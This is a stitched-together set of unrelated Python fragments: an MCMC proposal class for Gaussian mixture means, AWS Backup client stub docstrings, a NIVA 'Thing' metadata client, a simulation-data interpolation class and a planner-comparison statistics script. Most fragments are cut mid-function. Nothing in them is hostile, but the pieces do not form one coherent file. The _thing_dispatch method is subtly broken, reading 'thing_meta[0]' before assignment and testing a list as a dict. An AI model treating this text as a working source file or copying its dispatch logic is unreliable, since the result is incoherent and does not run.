def __init__(self, step_sizes=(0.001,), limit=200):
"""
Gaussian proposal distribution for the means. The multivariate Gaussian is centered at the means of the current
state in the Markov Chain and has covariance given by step_sizes. Multiple step sizes can be specified.
The proposal algorithm will take these steps in the sequence specified in step_sizes.
Parameters
----------
step_sizes : 1-D array_like
Iterable containing the sequence of step sizes (covariances of the Gaussian proposal distribution"
"""
super(GaussianTuningStepMeansProposal, self).__init__()
self.limit = limit
self.count_steps = 0
self.count_acceptance_bucket = np.zeros((len(step_sizes),))
self.record = []
self.step_sizes = step_sizes
self.count_accepted = np.zeros((len(step_sizes),))
self.count_illegal = np.zeros((len(step_sizes),))
self.count_proposed = np.zeros((len(step_sizes),))
def propose(self, X, gmm, target, n_jobs=1):
"""
Propose a new set of GMM means.
Parameters
----------
X : 2-D array like of shape (n_samples, n_features)
The observed data or evidence.
gmm : GMM object
The current state (set of gmm parameters) in the Markov Chain
target : GMMPosteriorTarget object
The target distribution to be found.
n_jobs : int
Number of cpu cores to use in the calculation of log probabilities.
Returns
-------
: GMM
A new GMM object | |
body of a backup plan. Includes a ``BackupPlanName`` and one or more sets of ``Rules`` .
- **BackupPlanName** *(string) --*
The display name of a backup plan.
- **Rules** *(list) --*
An array of ``BackupRule`` objects, each of which specifies a scheduled task that is used to back up a selection of resources.
- *(dict) --*
Specifies a scheduled task used to back up a selection of resources.
- **RuleName** *(string) --*
An optional display name for a backup rule.
- **TargetBackupVaultName** *(string) --*
The name of a logical container where backups are stored. Backup vaults are identified by names that are unique to the account used to create them and the AWS Region where they are created. They consist of lowercase letters, numbers, and hyphens.
- **ScheduleExpression** *(string) --*
A CRON expression specifying when AWS Backup initiates a backup job.
- **StartWindowMinutes** *(integer) --*
An optional value that specifies a period of time in minutes after a backup is scheduled before a job is canceled if it doesn't start successfully.
- **CompletionWindowMinutes** *(integer) --*
A value in minutes after a backup job is successfully started before it must be completed or it is canceled by AWS Backup. This value is optional.
- **Lifecycle** *(dict) --*
The lifecycle defines when a protected resource is transitioned to cold storage and when it expires. AWS Backup transitions and expires backups automatically according to the lifecycle that you define.
Backups transitioned to cold storage must be stored in cold storage for a minimum of 90 days. Therefore, the “expire after days” setting must be 90 days greater than the “transition to cold after days” setting. The “transition to cold after days” setting cannot be changed after a backup has been transitioned to cold.
- **MoveToColdStorageAfterDays** *(integer) --*
Specifies the number of days after creation that a recovery point is moved to cold storage.
- **DeleteAfterDays** *(integer) --*
Specifies the number of days after creation that a recovery point is deleted. Must be greater than ``MoveToColdStorageAfterDays`` .
- **RecoveryPointTags** *(dict) --*
An array of key-value pair strings that are assigned to resources that are associated with this rule when restored from backup.
- *(string) --*
- *(string) --*
- **RuleId** *(string) --*
Uniquely identifies a rule that is used to schedule the backup of a selection of resources.
- **BackupPlanId** *(string) --*
Uniquely identifies a backup plan.
- **BackupPlanArn** *(string) --*
An Amazon Resource Name (ARN) that uniquely identifies a backup plan; for example, ``arn:aws:backup:us-east-1:123456789012:plan:8F81F553-3A74-4A3F-B93D-B3360DC80C50`` .
- **VersionId** *(string) --*
Unique, randomly generated, Unicode, UTF-8 encoded strings that are at most 1,024 bytes long. Version IDs cannot be edited.
- **CreatorRequestId** *(string) --*
A unique string that identifies the request and allows failed requests to be retried without the risk of executing the operation twice.
- **CreationDate** *(datetime) --*
The date and time that a backup plan is created, in Unix format and Coordinated Universal Time (UTC). The value of ``CreationDate`` is accurate to milliseconds. For example, the value 1516925490.087 represents Friday, January 26, 2018 12:11:30.087 AM.
- **DeletionDate** *(datetime) --*
The date and time that a backup plan is deleted, in Unix format and Coordinated Universal Time (UTC). The value of ``CreationDate`` is accurate to milliseconds. For example, the value 1516925490.087 represents Friday, January 26, 2018 12:11:30.087 AM.
- **LastExecutionDate** *(datetime) --*
The last time a job to back up resources was executed with this backup plan. A date and time, in Unix format and Coordinated Universal Time (UTC). The value of ``LastExecutionDate`` is accurate to milliseconds. For example, the value 1516925490.087 represents Friday, January 26, 2018 12:11:30.087 AM.
:type BackupPlanId: string
:param BackupPlanId: **[REQUIRED]**
Uniquely identifies a backup plan.
:type VersionId: string
:param VersionId:
Unique, randomly generated, Unicode, UTF-8 encoded strings that are at most 1,024 bytes long. Version IDs cannot be edited.
:rtype: dict
:returns:
"""
pass
def get_backup_plan_from_json(self, BackupPlanTemplateJson: str) -> Dict:
"""
Returns a valid JSON document specifying a backup plan or an error.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupPlanFromJSON>`_
**Request Syntax**
::
response = client.get_backup_plan_from_json(
BackupPlanTemplateJson='string'
)
**Response Syntax**
::
{
'BackupPlan': {
'BackupPlanName': 'string',
'Rules': [
{
'RuleName': 'string',
'TargetBackupVaultName': 'string',
'ScheduleExpression': 'string',
'StartWindowMinutes': 123,
'CompletionWindowMinutes': 123,
'Lifecycle': {
'MoveToColdStorageAfterDays': 123,
'DeleteAfterDays': 123
},
'RecoveryPointTags': {
'string': 'string'
},
'RuleId': 'string'
},
]
}
}
**Response Structure**
- *(dict) --*
- **BackupPlan** *(dict) --*
Specifies the body of a backup plan. Includes a ``BackupPlanName`` and one or more sets of ``Rules`` .
- **BackupPlanName** *(string) --*
The display name of a backup plan.
- **Rules** *(list) --*
An array of ``BackupRule`` objects, each of which specifies a scheduled task that is used to back up a selection of resources.
- *(dict) --*
Specifies a scheduled task used to back up a selection of resources.
- **RuleName** *(string) --*
An optional display name for a backup rule.
- **TargetBackupVaultName** *(string) --*
The name of a logical container where backups are stored. Backup vaults are identified by names that are unique to the account used to create them and the AWS Region where they are created. They consist of lowercase letters, numbers, and hyphens.
- **ScheduleExpression** *(string) --*
A CRON expression specifying when AWS Backup initiates a backup job.
- **StartWindowMinutes** *(integer) --*
An optional value that specifies a period of time in minutes after a backup is scheduled before a job is canceled if it doesn't start successfully.
- **CompletionWindowMinutes** *(integer) --*
A value in minutes after a backup job is successfully started before it must be completed or it is canceled by AWS Backup. This value is optional.
- **Lifecycle** *(dict) --*
The lifecycle defines when a protected resource is transitioned to cold storage and when it expires. AWS Backup transitions and expires backups automatically according to the lifecycle that you define.
Backups transitioned to cold storage must be stored in cold storage for a minimum of 90 days. Therefore, the “expire after days” setting must be 90 days greater than the “transition to cold after days” setting. The “transition to cold after days” setting cannot be changed after a backup has been transitioned to cold.
- **MoveToColdStorageAfterDays** *(integer) --*
Specifies the number of days after creation that a recovery point is moved to cold storage.
- **DeleteAfterDays** *(integer) --*
Specifies the number of days after creation that a recovery point is deleted. Must be greater than ``MoveToColdStorageAfterDays`` .
- **RecoveryPointTags** *(dict) --*
An array of key-value pair strings that are assigned to resources that are associated with this rule when restored from backup.
- *(string) --*
- *(string) --*
- **RuleId** *(string) --*
Uniquely identifies a rule that is used to schedule the backup of a selection of resources.
:type BackupPlanTemplateJson: string
:param BackupPlanTemplateJson: **[REQUIRED]**
A customer-supplied backup plan document in JSON format.
:rtype: dict
:returns:
"""
pass
def get_backup_plan_from_template(self, BackupPlanTemplateId: str) -> Dict:
"""
Returns the template specified by its ``templateId`` as a backup plan.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupPlanFromTemplate>`_
**Request Syntax**
::
response = client.get_backup_plan_from_template(
BackupPlanTemplateId='string'
)
**Response Syntax**
::
{
'BackupPlanDocument': {
'BackupPlanName': 'string',
'Rules': [
{
'RuleName': 'string',
'TargetBackupVaultName': 'string',
'ScheduleExpression': 'string',
'StartWindowMinutes': 123,
'CompletionWindowMinutes': 123,
'Lifecycle': {
'MoveToColdStorageAfterDays': 123,
'DeleteAfterDays': 123
},
'RecoveryPointTags': {
'string': 'string'
},
'RuleId': 'string'
},
]
}
}
**Response Structure**
- *(dict) --*
- **BackupPlanDocument** *(dict) --*
Returns the body of a backup plan based on the target template, including the name, rules, and backup vault of the plan.
- **BackupPlanName** *(string) --*
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Object oriented interface to NIVA Thing universe
"""
__all__ = ["Thing", "Platform", "Vessel", "Sensor", "TimeSeries",
"FlagTimeSeries", "GPSTrack", "ThingError"]
from dateutil.parser import parse
from .metaflow import get_thing as meta_get_thing
from .metaflow import update_thing as meta_update_thing
from .metaflow import delete_thing as meta_delete_thing
from .metaflow import thing_tree2ts
from .get_data import PyNIVAError
from .tsb import get_signals
class ThingError(PyNIVAError):
"""Exception wrapper for Thing universe
"""
pass
class Thing:
"""Base class for the Thing universe
"""
TTYPE = "thing"
def __init__(self, meta_dict=None, **kwargs):
if meta_dict is None:
meta_dict = {}
for k, v in kwargs.items():
meta_dict[k] = v
if "path" in meta_dict and "name" not in meta_dict:
assert(isinstance(meta_dict["path"], str))
meta_dict["name"] = meta_dict["path"].split("/")[-1]
if "ttype" not in meta_dict:
meta_dict["ttype"] = self.TTYPE
self._meta_dict = meta_dict
def __getattr__(self, attr):
try:
return self._meta_dict[attr]
except:
raise AttributeError("Attribute '%s' not found" % (attr,))
def __setattr__(self, attr, value):
if attr != "_meta_dict":
self.__dict__["_meta_dict"][attr] = value
else:
self.__dict__[attr] = value
def __dir__(self):
return (super().__dir__() + [k for k in self._meta_dict.keys() if not k.startswith("_")])
@classmethod
def _thing_dispatch(cls, thing_data):
if isinstance(thing_data, list):
if len(thing_data) == 0:
return thing_data
elif len(thing_data) == 1:
assert(isinstance(thing_data, dict) and "ttype" in thing_data[0] and thing_data[0]["ttype"] in _valid_types)
thing_meta = _dispatcher[thing_data[0]["ttype"]](thing_meta[0])
elif isinstance(thing_data, list) and len(thing_data) > 1:
thing_meta = [cls._thing_dispatch(t) for t in thing_data]
elif isinstance(thing_data, dict) and "ttype" in thing_data:
try:
assert(thing_data["ttype"] in _valid_types)
except AssertionError:
raise ThingError("%s is not a valid thing type" % thing_data["ttype"])
for k,v in thing_data.items():
if isinstance(v, dict) and "ttype" in v:
thing_data[k] = cls._thing_dispatch(v)
elif isinstance(v, list):
c_list = []
for e in v:
if isinstance(e, dict) and "ttype" in e:
c_list.append(cls._thing_dispatch(e))
else:
c_list.append(e)
thing_data[k] = c_list
thing_meta = _dispatcher[thing_data["ttype"]](thing_data)
else:
raise ThingError("Unknown data type passed, must be a dictionary or a list of dictionarise")
return thing_meta
@classmethod
def get_thing(cls, meta_host, params=None, header=None, session=None, **kwargs):
"""Get a Thing instance (or subclass) or a list of instances
according to the supplied parameters.
The data is fetched from the 'metaflow' back-end.
Args:
meta_host: URL to meta server (i.e. 'metaflow' service)
params: Dictionary with query parameters
header: HTTP request header (for JWT authentication and encryption)
session: Requests session object
**kwargs: Named parameters
Returns:
A Thing (or subclass) instance or a list of instances fetched
from 'metaflow' back-end.
"""
if params is None:
c_params = dict()
else:
c_params = params.copy()
for k, v in kwargs.items():
c_params[k] = v
thing_meta = meta_get_thing(meta_host, c_params, header=header, session=session)
return cls._thing_dispatch(thing_meta)
@classmethod
def get_or_create(cls, meta_host, params=None, header=None,
path_only=False, session=None, **kwargs):
"""Get a single Thing instance (or subclass) from
the 'metaflow' back-end or if it doesn't exist
create a new instance.
Args:
meta_host: URL to meta server (i.e. 'metaflow' service)
params: Dictionary with query parameters
header: HTTP request header (for JWT authentication and encryption)
path_only: If True only the path will be used in the 'metaflow' query
session: Requests session object
**kwargs: Named parameters
Returns:
A single Thing (or subclass) instance or a list of instances fetched
from 'metaflow' back-end.
"""
if params is None:
c_params = dict()
else:
c_params = params.copy()
if path_only:
assert("path" in c_params or "path" in kwargs)
c_par = {"path": kwargs["path"]} if "path" in kwargs else {"path": params["path"]}
c_thing = cls.get_thing(meta_host, header=header, session=session, **c_par)
else:
c_thing = cls.get_thing(meta_host, params=params, header=header, session=session, **kwargs)
if isinstance(c_thing, list):
try:
assert(len(c_thing) <= 1)
except AssertionError:
raise(ThingError("Thing not unique, multiple Things matches search"))
if len(c_thing) == 0:
# Create new object
for k,v in kwargs.items():
c_params[k] = v
if "ttype" not in c_params:
c_params["ttype"] = cls.TTYPE
c_thing = cls._thing_dispatch(c_params)
return c_thing
@classmethod
def list(cls, meta_host, header=None, session=None, **kwargs):
"""Get a list of Thing instances of the type matching the
caller class and search criteria in 'metaflow'.
Args:
meta_host: URL to meta server (i.e. 'metaflow' service)
header: HTTP request header (for JWT authentication and encryption)
session: Requests session object
**kwargs: Named parameters
Returns:
A list of Things (or subclass) instance or a list of instances fetched
from 'metaflow' back-end.
Example:
# Get all available Thing instances from 'metaflow'
my_things = Thing.list(meta_host, header=header)
"""
params = {"ttype": cls.TTYPE}
for k, v in kwargs.items():
params[k] = v
t_list = cls.get_thing(meta_host, params=params, header=header, session=session)
return t_list if isinstance(t_list, list) else [t_list,]
@classmethod
def tdict2thing(cls, tdict, parts=False):
"""Dispatcher to create a Thing (or subclass) instance
from a dictionary.
Args:
tdict: Dictionary with parameters, must contain a 'ttype'
parts: If True the method will build a domain model tree if present in tdict
Returns:
A Thing (or subclass) instance
"""
if parts and "parts" in tdict:
tdict["parts"] = [cls.tdict2thing(part) for part in tdict["parts"]]
return _dispatcher[tdict["ttype"]](tdict)
def as_dict(self, shallow=False):
"""Return data of instance as a dictionary.
The data will be JSON serializable
Args:
shallow: if True uuids will be used instead of objects
Returns:
A JSON serializable dictionary representing the Thing instance
"""
def _dict_iter(c_dict):
out_dict = c_dict.copy()
for k in out_dict.keys():
if isinstance(c_dict[k], Thing):
if not shallow and not k == "part_of":
out_dict[k] = out_dict[k].as_dict(shallow)
else:
out_dict[k] = out_dict[k].uuid if hasattr(out_dict[k], "uuid") else out_dict[k].path
elif isinstance(out_dict[k], list):
c_list = []
for e in out_dict[k]:
if isinstance(e, Thing):
if not shallow and not k == "part_of":
c_list.append(e.as_dict())
else:
c_list.append(e.uuid if hasattr(e, "uuid") else e.path)
elif isinstance(e, dict):
c_list.append(_dict_iter(e))
else:
c_list.append(e)
out_dict[k] = c_list
elif isinstance(out_dict[k], dict):
out_dict[k] = _dict_iter(out_dict[k])
else:
pass
return out_dict
return(_dict_iter(self._meta_dict))
def update(self, data=None, **kwargs):
"""Update Thing instance in place
Args:
data: dictionary with new instance data
**kwargs: Named parameters
Returns:
self
"""
if data is None:
meta_dict = {}
else:
meta_dict = data.copy()
for k, v in kwargs.items():
meta_dict[k] = v
for k, v in meta_dict.items():
self._meta_dict[k] = v
return self
def save(self, meta_host, header=None, session=None):
"""Save/update Thing in 'metaflow' meta-data service
Note that the method will also recursively update/save
objects found in self.parts list to ensure 'metaflow' is kept
in a consistent state.
Args:
meta_host: URL of 'metaflow' service
header: HTTP request header (for JWT authentication and encryption)
session: Requests session object
Returns:
The persisted instance. Note that the returned instance will
be different from the caller instance.
"""
c_parts = self._meta_dict.get("parts", None)
if c_parts is not None:
del(self._meta_dict["parts"])
updated_data = meta_update_thing(meta_host, self.as_dict(shallow=True),
header=header, session=session)
updated_thing = self._thing_dispatch(updated_data)
if c_parts is not None:
# Handle possible inconsistencies in parts
assert(isinstance(c_parts, list))
for p in c_parts:
p.part_of = updated_thing.uuid
p = p.save(meta_host, header=header, session=session)
updated_thing.parts = c_parts
return updated_thing
def delete(self, meta_host, header=None, recursive=True, session=None):
"""Delete the object in meta-data service
The server side API will make sure the part_of structure
will remain/stay consistent after the delete.
Args:
meta_host: URL of 'metaflow' service
header: HTTP request header (for JWT authentication and encryption)
recursive: Also delete child objects
session: Requests session object
Returns:
The deleted instance (self).
"""
if recursive:
c_instance = self.get_tree(meta_host, header=header, levels=1, session=session)
c_parts = c_instance.parts if hasattr(c_instance, "parts") else []
for p in c_parts:
p.delete(meta_host, header=header, recursive=recursive, session=session)
if hasattr(self, "parts"):
del(self._meta_dict["parts"])
deleted_data = meta_delete_thing(meta_host, self.as_dict(shallow=True), session=session)
deleted_thing = self._thing_dispatch(deleted_data)
return deleted_thing
def get_tree(self, meta_host, header=None, levels=100, session=None):
"""Get data model tree for Thing instance
Args:
meta_host: URL of 'metaflow' service
header: HTTP request header (for JWT authentication and encryption)
levels: Maximum tree depth returned
session: Requests session object
Returns:
Thing instance with childrens (in 'parts' attribute) attached
"""
return self.get_thing(meta_host, header=header, uuid=self.uuid, parts=levels, session=session)
class Component(Thing):
"""Component or part of a thing
"""
TTYPE = "component"
pass
class Platform(Thing):
"""Base class for sensor/measurement platforms
"""
TTYPE = "platform"
def get_all_tseries(self, meta_host, header=None, session=None):
"""Method returning all available time series instances
attached to the Platform.
Args:
meta_host: URL of 'metaflow' service
header: HTTP request header (for JWT authentication and encryption)
session: Requests session object
Returns:
A list of TimeSeries instances attached to the Platform
"""
def _part_uuid2thing(thing, tlookup):
if isinstance(thing, dict):
return tlookup[thing["uuid"]]
if hasattr(thing, "parts") and thing._meta_dict["parts"] is not None:
thing._meta_dict["parts"] = [_part_uuid2thing(part, tlookup) for part in thing.parts]
return tlookup[thing.uuid]
full_thing = self.get_tree(meta_host, header=header, session=session)
thing_tree = full_thing.as_dict()
ts_list = [Thing.tdict2thing(ts) for ts in thing_tree2ts(thing_tree)]
| |
a computed uniform
distribution of points, 'npoints', on that sphere(s). It can return the 'theta,phi' (mollweide)
coordinates of the 'varloc' values as well.
Parameters
----------
varloc: str, int, np.ndarray
String: for the variable you want if defined on instantiation
Int: index location of the variable you want
np.ndarray: quantity you want to have interpolated on the sphere
radius: float or np.ndarray
The radius of the sphere you want 'varloc' to be interpolated to
fname: None, int
None: default option, will grab current dump
int: Dump number
npoints: int
The number of 'theta and phi' points you want for a projection plot
method: str
'trilinear': Use a trilinear method to interpolate onto the points on igrid
'moments': Use a moments averaging within a cell and using a quadratic function
as the form for the interpolation
logvar: bool
For better fitting should I do var = np.log10(var)? The returned var_interpolated
will be scaled back to linear
plot_mollweide: bool
If you want returned the theta, phi coordinates of the interpolated values so that it
can be plotted with a projection method
get_igrid: bool
If you want returned the actual grid points (x,y,z) used for the interpolation
Returns
-------
var_interpolated: np.ndarray
The array containing var interpolated at 'radius'
theta_grid: np.ndarray
The array containing the "mollweide" theta points that were interpolated to
phi_grid: np.ndarray
The array containing the "mollweide" phi points that were interpolated to
igrid: np.ndarray
The array containing the x,y,z coordinates of the points that were interpolated to
'''
# I will construct an appropriate igrid and let get_interpolation do the rest
# do we have many radii?
try:
first_r = radius[0]
except (TypeError, IndexError) as e:
# ok, we have an error, it is a single float or int
radius = np.array([radius])
# get the grid to be interpolated to
igrid, theta_grid, phi_grid = self._constantArea_spherical_grid(radius, npoints)
# for mollweide we have to transform these
theta_grid, phi_grid = self._transform_mollweide(theta_grid, phi_grid)
# More checks will be done with get_interpolation
var_interp = self.get_interpolation(varloc, igrid, fname, method, logvar)
# This var_interp and igrid COULD be a flattened array, let's reshape if so
if len(radius) > 1:
# to prevent copying array
igrid.shape = (len(radius),npoints,3)
var_interp.shape = (len(radius),npoints)
# Are we plotting mollweide, and/or returning igrid?
if get_igrid:
if plot_mollweide:
return var_interp, theta_grid, phi_grid, igrid
else:
return var_interp, igrid
else:
if plot_mollweide:
return var_interp, theta_grid, phi_grid
else:
return var_interp
def get_spherical_components(self, ux, uy, uz, fname=None, igrid=None):
'''
Vector quantities are output in the cartesian coordinates but we can transform them to
spherical coordinates using unit vectors. This returns the spherical components of u
Parameters
----------
ux, uy, uz: int, str, np.ndarray
int: integer referring to varloc
str: string referring to quantity varloc
np.ndarray: array with quantities
fname: None, int
None: default option, will grab current dump
int: Dump number
igrid: np.ndarray
If the quantity is not defined on the entire grid we can still convert it if we know the
cartesian points that it is on. Note:
igrid.shape = (len(ux.flatten()),3)
igrid[:,0] = z, igrid[:,1] = y, igrid[:,2] = x
Returns
-------
u_spherical: list of np.ndarray
The spherical components of u
'''
# first check if we are using the grid or not
if not isinstance(igrid,np.ndarray):
if not self._grid_jacobian_exists:
# create the grid jacobian, keep this in memory
self._grid_jacobian = self._get_jacobian(self._xc_view,self._yc_view,self._zc_view, self._radius_view)
self._grid_jacobian_exists = True
# local variable to reference internal jacobian
jacobian = self._grid_jacobian
else:
radius = np.sqrt(np.power(igrid[:,2],2.0) + np.power(igrid[:,1],2.0) + np.power(igrid[:,0],2.0))
jacobian = self._get_jacobian(igrid[:,2],igrid[:,1],igrid[:,0],radius)
# first grab quantities if we need to
if not isinstance(ux,np.ndarray):
ux = self._get(ux,fname)
if not isinstance(uy,np.ndarray):
uy = self._get(uy,fname)
if not isinstance(uz,np.ndarray):
uz = self._get(uz,fname)
ur = ux * jacobian[0] + uy * jacobian[1] + uz * jacobian[2]
utheta = ux * jacobian[3] + uy * jacobian[4] + uz * jacobian[5]
uphi = ux * jacobian[6] + uy * jacobian[7]
return [ur, utheta, uphi]
def get(self, varloc, fname=None):
'''
Returns variable var at a specific point in the simulation's time evolution. var is
referenced from 'varloc' which can be a string (referring to var's name that you
specified and instantiation) or an integer referring to whatever[varloc]
IMPORTANT NOTE: This is a copy of the actual data. This is to ensure that a dump's data
will be deleted when new data is deleted i.e we are preserving that there will be no
references!
Parameters
----------
varloc: str, int
String: for the variable you want if defined on instantiation
Int: index location of the variable you want
fname: None,int
None: default option, will grab current dump
int: Dump number
Returns
-------
var: np.ndarray
Variable referenced with 'varloc' as given by MomsData.get() if the MomsData
corresponding to 'fname' exists.
'''
# if fname is not specified use current dump
if fname == None:
fname = self.what_dump_am_i
# quick check if we already have the momsdata in memory
if str(fname) in self._many_momsdata:
# This is public, we must give a copy
# let's try this, if we get key error then obviously...
try:
return self._many_momsdata[str(fname)].get(self._varloc[str(varloc)]).copy()
except KeyError as e:
err = 'Invalid key for varloc. A list of keys: \n'
err += ', '.join(sorted(map(str,self._varloc.keys())))
self._messenger.error(err)
raise e
else:
# grab a new datacube. If we don't have this in memory already (self._many_momsdata) we grab a new datacube
self._get_dump(fname)
# This is public, we must give a copy
# let's try this, if we get key error then obviously...
try:
return self._many_momsdata[str(fname)].get(self._varloc[str(varloc)]).copy()
except KeyError as e:
err = 'Invalid key for varloc. A list of keys: \n'
err += ', '.join(sorted(map(str,self._varloc.keys())))
self._messenger.error(err)
raise e
def gradient(self, f, fname=None):
'''
Take the gradient of a scalar field in CARTESIAN coordinates. This uses central
differences using points directly on the grid (no interpolation).
Parameters
----------
f: np.ndarray
scalar field defined on the grid
fname: None,int
None: default option, will grab current dump
int: Dump number
Returns
-------
grad_f: list of np.ndarray
list containing fx, fy and fz
'''
if not isinstance(f,np.ndarray):
f = self._get(f,fname)
else:
# check len of shape of f
if len(f.shape) != 3:
err = 'The input f does not have its data formatted as f[z,y,x], make sure the shape is ({:0},{:0},{:0})'\
.format(self.moms_ngridpoints)
self._messenger.error(err)
raise ValueError
# we use the unique coordinates as the values on the grid (these should have had uniform spacing but don't...)
gradf = np.gradient(f,self._unique_coord,self._unique_coord,self._unique_coord)
# we get fz, fy and then fx, rearrange
gradf.reverse()
return gradf
def sphericalHarmonics_format(self, varloc, radius, fname=None, lmax=None, method='trilinear',
get_theta_phi_grids=False, get_igrid=False):
'''
To describe a function on a sphere it can be decomposed into its modes through spherical
harmonics. To do this efficiently, a particular theta, phi grid is used which is different
from what the self.get_spherical_interpolation uses. Keep in mind that for a given lmax:
The number of theta subdivisions across its domain is N = 2*(l+1)
The number of phi subdivisions across its domain is 2*N = 4*(l+1)
The number of points being interpolated to is npoints = 8*(l+1)**2
Parameters
----------
varloc: str, int, np.ndarray
String: for the variable you want if defined on instantiation
Int: index location of the variable you want
np.ndarray: quantity you want to have interpolated on the sphere
radius: float
The radius of the sphere you want 'varloc' to be interpolated to
fname: None, int
None: default option, will grab current dump
int: Dump number
lmax: None, int
None: default option will use the maximum resolvable l for this 'radius' and moments
data grid size, i.e lmax = pi * radius / self.moms_gridresolution
int: The maximum l value that you wish to use
method: str
'trilinear': Use a trilinear method to interpolate onto the points on igrid
'moments': Use a moments averaging within a cell and using a quadratic function
as the form for the interpolation
get_theta_phi_grids: bool
If you want returned the theta, phi coordinates of the interpolated | |
prob][0]
for prob in solved_by_md:
md_mapping[prob] = [x for x in filter_settings(good_data, MIN_DEORDERING) if "%s/%s" % (x[0], x[1]) == prob][0]
for prob in solved_by_mr:
mr_mapping[prob] = [x for x in filter_settings(good_data, MIN_REORDERING) if "%s/%s" % (x[0], x[1]) == prob][0]
for prob in solved_by_md:
rx_mapping[prob] = [x for x in filter_settings(good_data, MIN_DEORDERING) if "%s/%s" % (x[0], x[1]) == prob][0]
solved_action_increase = [prob for prob in solved_by_lcp if float(lcp_mapping[prob][9]) > float(lcp_mapping[prob][10])]
lcp_action_decrease = [1 - (float(lcp_mapping[prob][10]) / float(lcp_mapping[prob][9])) for prob in solved_action_increase]
lcp_action_decrease_all = [1 - (float(lcp_mapping[prob][10]) / float(lcp_mapping[prob][9])) for prob in solved_by_lcp]
def flex(num_acts, num_orders):
def nCr(n,r):
import math
f = math.factorial
return f(n) / f(r) / f(n-r)
return 1.0 - (float(num_orders) / float(nCr(int(num_acts), 2)))
lcp_flex = [flex(float(lcp_mapping[prob][10]), float(lcp_mapping[prob][12])) for prob in solved_by_lcp]
md_flex = [flex(float(md_mapping[prob][10]), float(md_mapping[prob][12])) for prob in solved_by_md]
mr_flex = [flex(float(mr_mapping[prob][10]), float(mr_mapping[prob][12])) for prob in solved_by_mr]
rx_flex = [flex(float(rx_mapping[prob][9]), float(rx_mapping[prob][11])) for prob in solved_by_md]
#lcp_flex = [flex(float(lcp_mapping[prob][10]), float(lcp_mapping[prob][12])) for prob in solved_by_all]
#md_flex = [flex(float(md_mapping[prob][10]), float(md_mapping[prob][12])) for prob in solved_by_all]
#mr_flex = [flex(float(mr_mapping[prob][10]), float(mr_mapping[prob][12])) for prob in solved_by_all]
#rx_flex = [flex(float(rx_mapping[prob][9]), float(rx_mapping[prob][11])) for prob in solved_by_all]
lcp_opt = [{'True':1,'False':0}[lcp_mapping[prob][13]] for prob in solved_by_lcp]
md_opt = [{'True':1,'False':0}[md_mapping[prob][13]] for prob in solved_by_md]
mr_opt = [{'True':1,'False':0}[mr_mapping[prob][13]] for prob in solved_by_mr]
print("\nAll problems:\t %d" % len(all_problems))
print("Solved by all:\t %d" % len(solved_by_all))
print(" -{ Action Improvement (only improvements) }-")
print("Occurrences:\t %d / %d = %f" % (len(solved_action_increase),
len(solved_by_lcp),
float(len(solved_action_increase)) / float(len(solved_by_lcp))))
print("Arith. mean:\t %f +/- %f" % (mean(lcp_action_decrease), std(lcp_action_decrease)))
print("Geometric mean:\t %f" % product(lcp_action_decrease)**(1.0 / len(lcp_action_decrease)))
print("\n -{ Action Improvement (all) }-")
print("Occurrences:\t %d" % len(solved_by_lcp))
print("Arith. mean:\t %f +/- %f" % (mean(lcp_action_decrease_all), std(lcp_action_decrease_all)))
print("Geometric mean:\t %f" % product(lcp_action_decrease_all)**(1.0 / len(lcp_action_decrease_all)))
print("\n -{ Average Flex (Arithmetic) }-")
print("LCP (%d): %f +/- %f" % (len(lcp_flex), mean(lcp_flex), std(lcp_flex)))
print("MR (%d): %f +/- %f" % (len(mr_flex), mean(mr_flex), std(mr_flex)))
print("MD (%d): %f +/- %f" % (len(md_flex), mean(md_flex), std(md_flex)))
print("RX (%d): %f +/- %f" % (len(rx_flex), mean(rx_flex), std(rx_flex)))
print("\n -{ Average Flex (Geometric) }-")
print("LCP (%d): %f" % (len(lcp_flex), product(lcp_flex)**(1.0 / len(lcp_flex))))
print("MR (%d): %f" % (len(mr_flex), product(mr_flex)**(1.0 / len(mr_flex))))
print("MD (%d): %f" % (len(md_flex), product(md_flex)**(1.0 / len(md_flex))))
print("RX (%d): %f" % (len(rx_flex), product(rx_flex)**(1.0 / len(rx_flex))))
print("\n -{ Instances Proved Optimal }-")
print("LCP: %d / %d = %f" % (sum(lcp_opt), len(lcp_flex), float(sum(lcp_opt)) / float(len(lcp_flex))))
print("MR: %d / %d = %f" % (sum(mr_opt), len(mr_flex), float(sum(mr_opt)) / float(len(mr_flex))))
print("MD: %d / %d = %f" % (sum(md_opt), len(md_flex), float(sum(md_opt)) / float(len(md_flex))))
#print " -{ Mean increase actions and constraints }-"
#print "lcp: (%f +- %f) / (%f +- %f)" % (mean(lcp_action_increase),
# std(lcp_action_increase),
# mean(lcp_ordering_increase),
# std(lcp_ordering_increase))
#print "md: (%f +- %f)" % (mean(md_ordering_increase),
# std(md_ordering_increase))
#print "mr: (%f +- %f)" % (mean(mr_ordering_increase),
# std(mr_ordering_increase))
print()
def compare_planners(counted_data, uncounted_data):
uncounted_ff = filter_settings(uncounted_data[0], LCP)
uncounted_popf = filter_settings(uncounted_data[1], LCP)
_solved_ff = set(["%s-%s" % (item[0], item[1]) for item in [x for x in uncounted_ff if GOOD == get_execution_status(x)]])
_solved_popf = set(["%s-%s" % (item[0], item[1]) for item in [x for x in uncounted_popf if GOOD == get_execution_status(x)]])
mutual_solved = _solved_ff & _solved_popf
solved_ff = [x for x in uncounted_ff if ("%s-%s" % (x[0], x[1])) in mutual_solved]
solved_popf = [x for x in uncounted_popf if ("%s-%s" % (x[0], x[1])) in mutual_solved]
ff_results = {}
popf_results = {}
for line in solved_ff:
ff_results["%s-%s" % (line[0], line[1])] = line
for line in solved_popf:
popf_results["%s-%s" % (line[0], line[1])] = line
action_total = 0.0
ordering_total = 0.0
action_total_ff = 0.0
action_total_popf = 0.0
ordering_total_ff = 0.0
ordering_total_popf = 0.0
print("")
popf_bet = 0
ff_bet = 0
for prob in mutual_solved:
if float(popf_results[prob][12]) > float(ff_results[prob][12]):
ff_bet += 1
if float(popf_results[prob][12]) < float(ff_results[prob][12]):
popf_bet += 1
action_total += float(ff_results[prob][10]) / float(popf_results[prob][10])
ordering_total += float(ff_results[prob][12]) / float(popf_results[prob][12])
action_total_ff += float(ff_results[prob][10]) / float(ff_results[prob][9])
action_total_popf += float(popf_results[prob][10]) / float(popf_results[prob][9])
ordering_total_ff += float(ff_results[prob][12]) / float(ff_results[prob][11])
